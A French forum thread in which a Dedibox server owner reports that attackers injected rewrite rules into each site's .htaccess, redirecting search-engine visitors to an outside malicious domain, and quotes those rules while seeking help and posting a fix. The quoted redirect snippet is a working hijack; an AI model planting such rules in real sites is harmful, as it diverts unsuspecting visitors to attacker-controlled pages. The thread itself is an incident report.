Le Forum Non Officiel de la DEDIBOX
Vous n'êtes pas identifié.
Pages: 1
Bonjour,
Je me suis rendu compte hier que lorsque l'on passait par un moteur de recherche pour aller sur l'un des sites disponibles sur mon serveur, on était redirigé vers ce site :
"http://kjski.org/"
J'ai donc cherché, et j'ai remarqué que les lignes suivantes avait été ajoutées à chaque fichier .htaccess de chaque site :
Options +FollowSymLinks
RewriteCond %{HTTP_REFERER} ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
RewriteRule .*$ http://rostoffhost.info/strf/ [L]Si le fichier .htaccess n'éxistait pas, il était crée. C'est du rewriting pour attirer tous mes visiteurs depuis les moteurs de recherche sur ce site de m+++++ !
J'ai donc supprimer ce bout de code pour chaque site ! Cela a fonctionner pour tous sauf deux !
Voici un exemple :
http://www.google.com/search?q=gascogne+gers
Allez au résultat : gascogne-gers.com et vous allez voir qu'il redirige !
J'ai vérifier ma configuration Apache, ma configuration Bind, et aucune redirection de ce type n'y est présente ! De plus, je ne voie pas du tout comment ils sont pu pénétrer tous les sites du serveur puisque j'avais fait beaucoup de modifications de sécurité. J'ai un pare feu, j'ai modifiés les ports d'accès des différentes administration sauf SSH mais il n'y a eu aucune connexion SSH. Tous les accès sont protégés par des mots de passe différents, contenant lettres et chiffres et assez longs.
Si un pro de linux pourrait me dire ! Apparemant, ils ont rajouté seulement des lignes de codes pour faire du rewriting.
Merci.
PS: De plus, dans mon webmin, je ne trouve plus l'icone pour acceder à la configuration du serveur Web Apache ! Sa a surement quelque chose à voir non ?
Hors ligne
Re bonjour,
Non, excusez moi pour la dernière ligne, c'est tout a fait normal, c'est moi qui est désactivé l'administration de apache depuis webmin par sécurité hier... Mais je fait telement de chose la, que j'oublie un peu. lol
Merci.
Hors ligne
Bonjour,
Problème résolu en remettant un fichier .htaccess :
# Sécurité. <Files .htaccess> order allow,deny deny from all </Files> # Réécriture. RewriteEngine on
C'est comme même bizarre que l'ajout du fichier annule la redirection faite je ne sais ou ! lol
Je risque fort de prendre un second serveur chez dedibox, le reprogrammer proprement et manuellement, sans VHCS car il parait que c'est une vrai passoir ! Puis je résilerai celui que j'ai en ma possession.
Mais bon, en attendant, si quelqu'un serait ou serait planqué les fameuses lignes dans la config de apache !
Hors ligne
Apparement, c'est une attaque massive de dedibox par ce site ... : http://www.dedibox-news.com/sujet-4627- … ostoffhost
Si quelqu'un sait comment ils s'y prennent ?
Hors ligne
Pages: 1